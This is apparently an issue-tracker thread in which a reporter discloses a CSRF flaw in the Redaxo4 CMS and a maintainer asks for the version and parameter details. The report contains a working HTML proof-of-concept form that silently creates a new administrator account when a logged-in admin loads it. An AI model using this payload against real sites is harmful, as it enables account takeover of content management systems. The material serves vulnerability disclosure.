There is a CSRF vulnerability that can add an administrator

[riyir]

• After administrator log in, there is a CSRF vulnerability that can add an administrator via /redaxo4-master/redaxo/index.php?page=user
• poc
• csrf.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.61/redaxo4-master/redaxo/index.php" method="POST">
      <input type="hidden" name="page" value="user" />
      <input type="hidden" name="save" value="1" />
      <input type="hidden" name="FUNC&#95;ADD" value="1" />
      <input type="hidden" name="userlogin" value="bbb" />
      <input type="hidden" name="userpsw" value="bbbbbb" />
      <input type="hidden" name="username" value="Administrator" />
      <input type="hidden" name="userdesc" value="bbbbbb" />
      <input type="hidden" name="useradmin" value="1" />
      <input type="hidden" name="userstatus" value="1" />
      <input type="hidden" name="userperm&#95;sprachen&#91;&#93;" value="0" />
      <input type="hidden" name="userperm&#95;be&#95;sprache" value="" />
      <input type="hidden" name="userperm&#95;startpage" value="" />
      <input type="hidden" name="function" value="æ&#183;&#187;å&#138;&#160;ç&#148;&#168;æ&#136;&#183;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

[staabm]

thank you for the report.

could you describe a bit further how exactly (using which parameter) the vulnerability materializes?

which Redaxo4 version do you use?